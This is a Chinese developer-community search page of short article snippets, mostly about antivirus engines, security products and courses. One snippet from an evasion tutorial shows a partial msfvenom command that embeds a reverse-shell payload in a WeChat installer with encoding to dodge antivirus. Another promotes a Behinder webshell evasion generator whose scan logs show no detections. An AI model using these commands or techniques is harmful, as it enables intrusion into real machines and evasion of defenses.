首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

关于火绒的12个技术问题

近日有卡饭网友向火绒提出12个问题,从产品性能到核心技术。这些问题非常棒,无论提问者是网友还是友商,火绒团队都非常愿意一起探讨。我们尝试一一作答如下。 ?...火绒认为,对感染型病毒以及宏病毒尽量采用清除而非删除处理,是反病毒引擎必须具备的能力。我们选择了这条比较难的路,会一直努力。 如果遇到了火绒不能有效清除的样本,请随时联系我们。...回答: “火绒安全软件”构建了多重的、立体的防御体系,除了本地扫描引擎以外,还有基于系统监控的动态病毒行为识别等防御措施。...反病毒引擎的扫描过程,本质上来说是计算,计算是需要占用CPU时间来获得的,而对于CPU时间占用的多少则取决于计算的复杂度。...简单的文件哈希计算、统计学向量化及匹配等操作的计算量是可以忽略不记的,而启发式评估、虚拟沙盒等操作则是数据强计算型的操作,所以反病毒引擎在真正的扫描过程当中占用CPU是正常且合理的。

2.5K40

腾讯主机安全(云镜)兵器库:WebShell克星-TAV引擎

腾讯TAV反病毒引擎是腾讯安全的自研引擎,最初应用在腾讯电脑管家中检测清除病毒木马,支持腾讯电脑管家取得过一系列国际评测的优异成绩。...TAV WebShell引擎能力既可以应用于腾讯安全软件的本地检测引擎,也可以应用在云端服务。...腾讯TAV反病毒引擎 腾讯TAV反病毒引擎汇聚了腾讯安全多年来与恶意软件对抗的经验,具备高性能、高检出、高处理能力、低消耗等技术特点,极大地提升了腾讯安全旗下终端安全产品的杀毒能力,护航亿级用户的终端安全...依托腾讯安全反病毒实验室自研的TAV反病毒引擎,腾讯安全产品在各项国内外产品评测取得优异成绩,多次获得满分,最高评级。...实验室拥有专业的反病毒团队,在自主反病毒引擎TAV研发上深耕多年,拥有多项自主知识产权病毒检测专利。在VB100、 AV-C、AV-TEST等国际安全评测中多次取得满分成绩。

3.2K20
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    vivo商城促销系统架构设计与实践-概览篇

    基于这些痛点问题,我们一期完成促销系统的独立,与商城解耦,搭建出促销系统核心能力: 优惠活动管理 对所有优惠活动抽象出统一的优惠模型和配置管理界面,提供活动编辑、修改、查询及数据统计等功能。...促销计价 基于高度灵活、抽象化的计价引擎能力,通过定义分层计价的促销计价模型,制定统一的优惠叠加规则与计价流程,实现vivo商城促销计价能力的建设。...面对新品发布、11大为客户等大流量场景,如何满足高并发场景下的高性能要求。 面对来自上游业务方的不可信调用,以及下游依赖方的不可靠服务等复杂系统环境,如何提升系统整体的稳定性,保障系统的高可用。...3.1 可扩展性 扩展性提升主要体现在两块: 优惠模型的定义,对所有优惠活动抽象出统一的优惠模型和配置管理界面; 促销计价引擎的建立,计价模型的统一。 相关的详细设计内容,会有后续文章进行说明。...而使用缓存就需要关注数据一致性问题,redis缓存还好解决,但本地缓存不就好处理了。因此本地缓存的使用要看业务场景,尽量是数据不经常变更且业务上能接受一定不一致的场景。

    10.5K11

    火绒安全软件评测 | WitAwards 2016 「 年度安全产品」参评巡礼

    火绒3.0主要包括以下五点反病毒能力: 1) 火绒反病毒特征库:拥有自主研发的新一代反病毒引擎,相对于国内大部分杀毒软件来说,火绒不会局限于国外OEM的病毒库或者反病毒技术。...2) 火绒反病毒引擎扫描核心:进行逻辑扫描,静态文件扫描,动态文件扫描,特征码扫描,以及宏病毒和感染型病毒查杀等功能。...1.基于虚拟化的本地行为沙盒技术,通过极小的病毒库打造强大的查杀能力 2.完美清除各种感染型病毒、宏病毒,通过剥离附着在宿主程序中的病毒代码,实现对被感染文件的还原,不破坏原有程序和文档的数据 3.丰富的反病毒引擎解码能力...而火绒针对2B产品主要是反病毒引擎OEM和火绒剑分析工具。...WitAwards年度安全评选火热报名中 由FreeBuf主办的FIT 2017(2017 FreeBuf互联网安全创新大会)将于2016年12月28日-29日在上海陆家嘴上海国际会议中心召开。

    3.8K70

    自己写的程序被杀毒软件杀了怎么办?

    每一家安全公司的检测和匹配方式都不相同,常见的有传统的特征码匹配、静态动态启发等技术,关于火绒的反病毒引擎更详细的内容可以参考以下文档: 火绒反病毒扫描引擎:技术白皮书 http://bbs.huorong.cn.../thread-18372-1-1.html 火绒反病毒扫描引擎:虚拟沙盘技术简介 http://bbs.huorong.cn/thread-18373-1-1.html 火绒反病毒扫描引擎:“脚本行为沙盒...但是,近些年某些安全软件的误报非常常见,其主要原因还是因为安全公司在反病毒引擎等关键技术上缺少积累和研究,短时间内为了更高的检测率和更快响应速度,盲目依赖大数据和“人工智能“,牺牲了检测质量,导致的误报增多...,安全领域为此类“壳”起了个更为“高大上”的名字:“病毒混淆器”,其比较典型的混淆手段就包括代码变形、入口伪装…… 如果没有有效的反病毒引擎作支撑,只是利用大数据和“人工智能“作判断。...如果是加入安全软件的本地白名单,无法避免他人使用时继续报毒。如果是安全厂商因为误报了你的程序,要求你的软件加入它的白名单,这就是在用错误的方法掩饰他们的误报。

    4.9K40

    「网安夜校」开课啦!多门网络安全课程开启限时优惠报名

    安全行业发展前景分析 直播主题1:腾讯网络安全运维认证介绍 直播主题2:新时代下的网络安全的机遇与挑战 许浩伟 2月21日 腾讯云安全认证-网络安全原理 直播主题:协议欺骗攻击之断网攻击与数据窃取 龙远...渗透测试技术 直播主题1:黑客攻防之渗透测试技术 直播主题2:SQL注入攻防实践 许浩伟 2月27日 腾讯云安全认证-网络安全分析与应用 直播主题1:网络流量安全分析 直播主题2:网络安全分析之密码捕获 龙远...(9)恶意代码识别技术简介: 结合实际病毒样例,讲解杀毒引擎恶意代码识别技术原理。 (10)反虚拟机技术: 结合实际代理示例,介绍反病毒虚拟机的原理和相关技术。...(12)谁拿走了我的“福利”-羊毛党对抗实践: 通过课程讲解黑产运作方式、防火墙的功能和网络黑产的防范方法。 (13)DDoS网络安全对抗: 详解DDoS防护体系的背景、知识和相应的解决方案。...优惠信息 除了腾讯云大学的精选课程外,腾讯课堂也为各位同学准备诚意满满的优惠活动

    32.5K745

    火绒安全入选《2022年中国数字安全百强报告》专精特新百强

    核心技术中的新一代反病毒引擎,拥有国内唯一的“通用脱壳”能力,可以通过行为特征来精准判别各种电脑病毒和威胁代码。...基于强大、精准的本地查杀能力,火绒产品完全不受断网环境影响,适用于内外网隔离的政府、军方、公检法等内网机构用户。...火绒安全软件还是目前国内唯一一个将反病毒引擎、主动防御系统、网络防火墙深度融合在一起的终端安全产品,可以有效帮助机构用户抵御勒索等恶性病毒、黑客渗透等高等级威胁,并一举解决内网用户多年来漏洞防御困难、本地病毒屡杀不绝等难题...HUORONG 火绒安全成立于2011年,是一家专注、纯粹的安全公司,致力于在终端安全领域为用户提供专业的产品和专注的服务,并持续对外赋能反病毒引擎等相关自主研发技术。

    1K10

    【业界】Windows卫士出现严重漏洞,微软现已对其进行了修补

    在Windows 卫士、Security Essentials、Exchange 服务器、前沿端点保护和Intune端点保护的最新版本的Microsoft恶意软件防护引擎(1.1.14700.5)中,该错误...当恶意软件引擎扫描恶意的档案时,它会触发一个内存漏洞,导致执行在具有强大本地系统权限的文件中走私的恶意代码,从而对计算机进行完全控制。...显然,微软放弃了unrar版本,并将该组件集成到其操作系统的反病毒引擎中。然后修改了forked代码,使所有有符号整数变量都转换为无符号变量,从而在数学比较时引发连锁问题。...这使得软件容易受到内存损坏的影响,这些错误会导致反病毒包崩溃,或者允许恶意代码执行。 换句话说,Redmond从一开始就打了一场胜仗。...其中,有位谷歌研究员Tavis Ormandy表示: 总之,用户和管理员应该尽快更新他们的Windows卫士和恶意软件保护引擎的副本。

    1.2K60

    如何使用MultCheck从静态分析结果中识别恶意字节数据

    MultCheck是一款功能强大的恶意软件分析工具,广大研究人员可以直接使用该工具测试可疑目标文件是否具备恶意性,并检查目标文件是否被一个或多个反病毒引擎标记。...MultCheck易于使用,能够测试多款反病毒引擎。除此之外,该工具不仅允许我们根据实际需求进行功能扩展或自定义开发,而且还可以向其添加自定义的反病毒引擎。...工具要求 Golang 支持的扫描器 Windows Defender(winDef) 工具下载&配置 源码安装 由于该工具基于Go语言开发,因此我们首先需要在本地设备上安装并配置好最新版本的Go语言环境...接下来,广大研究人员可以直接使用下列命令将该项目源码克隆至本地: git clone https://github.com/MultSec/MultCheck.git 然后切换到项目根目录下,执行go

    8110

    “勒索病毒”RansomCrowti详细分析报告

    现如今的反病毒引擎也基本都可以对这类加壳程序进行识别,并通常都有不同程度的脱壳能力。...随着反病毒引擎技术的发展,为了对抗反病毒引擎的脱壳技术,病毒作者开始选择一些“地下壳”或者“私有壳”加密自己的病毒,这类壳也通常有着很强的代码变形能力,我们通常称这类病毒专属的壳为“病毒混淆器“。...传统扫描引擎对壳的”识别“被颠覆,基于“通用脱壳”(Generic Unpacking)的反病毒引擎应运而生。...图11、Stub Code构造的IAT 在解码过程中,混淆器使用了一个超大的循环,用于对付扫描引擎的模拟器(如图10、图12)。...图12、通过超大循环对抗反病毒虚拟机 3 病毒主体分析 在步过混淆代码之后,将内存镜像转储为2a8e29ab5d25b5cf1bddd21496dcab0aa8455b24_dump,这个就是勒索病毒Ransom

    1.9K10

    深度追踪WannaCry源头轶事

    注1:基于隐私问题,本文中隐去黑客相关信息,如有关部门需要,请与腾讯反病毒实验室联系。...WannaCry敲诈勒索病毒从12日全面爆发到今天已过去近1个月,通过各个杀毒厂商积极应对,病毒传播趋势有所收敛。...反病毒实验室工程师通过对新增样本进行详细分析,发现新增样本中出现大量被修改“传播开关”、修改比特币地址的样本。...下图为12号WannaCry爆发原始样本: ? 下图为被修改了比特币地址的样本: ? 可以看到,除了比特币地址被修改,其他信息全部一样。...得到猜测的黑客画像: 此人参加过CTF(网络安全竞赛) Youtube上制作过黑客教程 传播过PHP恶意程序 活跃于黑客网站论坛 来自阿尔及利亚 找到此人常用EMAIL地址 找到此人的照片 在网络搜索引擎

    1.1K60

    epp和edr_一文读懂分频器

    ,比如可疑命令、异常登录、反弹shell、上传webshell等,而启发式检测只是总结了一些恶意文件执行后的共同行为),同时结合威胁情报信息提升了EPP的反病毒能力,但以上全部过程都是防御能力的叠加,当针对性...EDR将一个企业的终端安全分为了预防、防御、检测、响应四个阶段,这也是Gratner指出的下一代终端安全软件应具备的4个能力象限,且每个象限指出了3个功能建议,即共12个建议项,只有12个功能全覆盖,才能闭环保护终端安全...EPP/EDR的第二个分野就是功能侧重点不同,CWPP的功能可以概括为通过资产管理、系统加固、配置和漏洞管理,减少系统本身的攻击面,兼顾丰富的入侵检测能力(暴力激活成功教程、异常登录、反弹shell、本地提权...1.具备多引擎杀毒能力,对对勒索病毒预防、防护、检测和响应的完整闭环能力 支持对病毒文件落地、运行的实时检测和拦截;支持基于多引擎的人工病毒查杀;自研人工智能引擎自主学习有效防御未知威胁,针对勒索病毒检测具备业界领先的检出率...丰富的入侵检测手段 利用暴力激活成功教程、异常登录、反弹shell、本地提权、后门检测、Web后门、可疑操作等多个角度来检测对Linux主机的入侵行为。

    2.8K10

    【护网必备】冰蝎WebShell免杀生成

    全版本格式:ASP,ASP.NET,PHP,JSP,JSPX,输入对应的编号即可生成,默认密码为Tas9er 免杀测试 腾讯电脑管家: 【扫描信息】 扫描用时:00:00:06 扫描类型:指定位置杀毒 扫描引擎...:管家云查杀引擎 管家系统反病毒引擎 管家系统修复引擎 Bitdefender本地查杀引擎 扫描状态:扫描完成 【扫描结果】 扫描文件数:5 发现风险数:0 已处理风险数:0 360杀毒软件:...扫描类型:右键扫描 扫描文件总数:5 项目总数:0 清除项目数:0 扫描选项 扫描所有文件:否 扫描压缩包:否 发现病毒处理方式:由用户选择处理 扫描磁盘引导区:是 扫描 Rootkit:否 使用云查杀引擎...:是 使用QVM人工智能引擎:是 扫描建议修复项:是 常规引擎设置: 扫描内容 C:\Users\Administrator\Desktop\Demo 白名单设置 扫描结果 未发现威胁文件 360...安全卫士: 360木马查杀扫描日志 扫描类型: 自定义扫描 扫描引擎:360云查杀引擎本地木马库) 360启发式引擎 QEX脚本查杀引擎 QVM Ⅱ人工智能引擎 鲲鹏引擎 扫描文件数: 5 系统关键位置文件

    34310

    行业首批︱腾讯云云镜荣获云计算产品信息安全和 CSA CSTR 证书

    腾讯云安全能力再获业界认可 在本次论坛上,腾讯云云镜主机安全防护系统荣获云计算产品信息安全认证证书(SaaS 增强级认证)和 全球顶级认证 CSA CSTR 云安全标准认证证书, 证书的获得,是通过了公安部第三研究所检测中心联合云安全联盟...本次只有四家一线网络安全企业获得了证书,测评严格,腾讯云云镜是首批通过该认证的极少数产品之一。 ? ?...04 AI 检测引擎和海量样本资源,构建领先的检测能力 针对恶意程序类的检测,后端集成腾讯电脑管家新一代 TAV 反病毒引擎及哈勃分析系统,快速响应未知风险。...基于机器学习的 WebShell 检测引擎,有效对抗加密变形类恶意脚本,新增恶意样本检出率达92%,业内同行产品均是70%左右。  ?

    13.9K30

    木马免杀方式_木马入侵的常见方法

    前言 免杀,又叫免杀毒技术,是反病毒,反间谍的对立面,是一种能使病毒或木马免于被杀毒软件查杀的软件。它除了使病毒木马免于被查杀外,还可以扩增病毒木马的功能,改变病毒木马的行为。...weinxin.exe,已经下载 2.4、发现被AV查杀 如果在实战中,直接投递裸奔马比较容易引起对方运维人员的警觉,这种方式也比较冒险,所以在投递之前,要测试制作的木马是否会引起相关AV的查杀,比如在在线多引擎病毒识别工具中去测试...2.5、这里po一个在线杀毒查杀的网站,virustotal是一个提供免费的可疑文件分析服务的网站,它与传统杀毒软件的不同之处是它通过多种反病毒引擎扫描文件。...使用多种反病毒引擎对您所上传的文件进行检测, 以判断文件是否被病毒, 蠕虫, 木马, 以及各类恶意软件感染。...windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12

    1.8K40

    腾讯主机安全“猎刃计划”正式发布!WebShell挑战赛再燃起,PHPer燥起来!

    为进一步提升安全性能,T-Sec主机安全团队联合腾讯安全云鼎实验室、腾讯安全反病毒实验室、腾讯安全科恩实验室、腾讯安全应急响应中心(TSRC)等,正式推出“猎刃计划”系列挑战赛,诚征各位安全猎手云上对抗...此次我们首次对外公开全新自研的WebShell攻击检测“引擎”——TAV反病毒引擎+洋葱恶意代码检测引擎,诚邀大家测试对抗。...挑战环境 1)搭建的检测引擎环境地址: http://175.178.188.150/ (公测开始时开放)。 参赛者可以在该地址提交PHP文件进行绕过测试。...常见问题FAQ 1)检测引擎检测结果说明: 查杀:上传文件被安全引擎判断为恶意文件。...未查杀:上传文件被安全引擎判断为正常文件 文件异常、扫描异常:检测服务器存在异常,请重新上传文件,如持续异常,请联系TSRC处理。

    1K70

    零跑汽车部署火绒安全 打造数字化车企新型网安护城河

    “火绒终端安全管理软件V2.0”能够取得客户的信任,有以下原因: 国产化、自主知识产权的反病毒技术背景。系统拥有全套火绒安全自主知识产权的反病毒核心技术,可有效避免生产、经营数据外泄。...应用业界领先的本地反病毒引擎,基于独有高仿真度“虚拟沙盒”环境,高效部署“通用脱壳”和“动态行为查杀”两大核心技术模块,通过行为特征来精准判断各类病毒。...不只零跑汽车,身处制造行业的他们都青睐火绒安全: HUORONG 火绒安全成立于2011年,是一家专注、纯粹的安全公司,致力于在终端安全领域为用户提供专业的产品和专注的服务,并持续对外赋能反病毒引擎等相关自主研发技术

    93220

    AVAR 2017 之感悟

    12 月 6 日 ,以“不忘初心——对抗日益严重的网络犯罪”为主题的第二十届亚洲反病毒大会 (AVAR 2017) 在京召开,来自全球 20 多个国家和地区的 200 多位顶级专家学者汇聚一堂,共议反病毒前沿技术及发展趋势...依我的看法,反病毒的工作以后会越来越依赖三样东西:互联网、大数据和人工智能。...2016 年,瑞星根据之前应用机器学习获得的经验,研发了高维度、大规模的基于随机森林的 Windows 恶意软件识别引擎 - RDM+。高维度特征提取自文件结构、内容以及分析,训练样本达数千万。...从今年AVAR会议的报告内容上来看,无论是大数据还是人工智能分析,都对反病毒技术产生了促进作用。...我们期盼着,也许真的有一天,能够像瑞星的叶超介绍的那样:反病毒工程师能够脱离繁重的体力劳动,能够真正做到比病毒快那么一点点。

    87750
    领券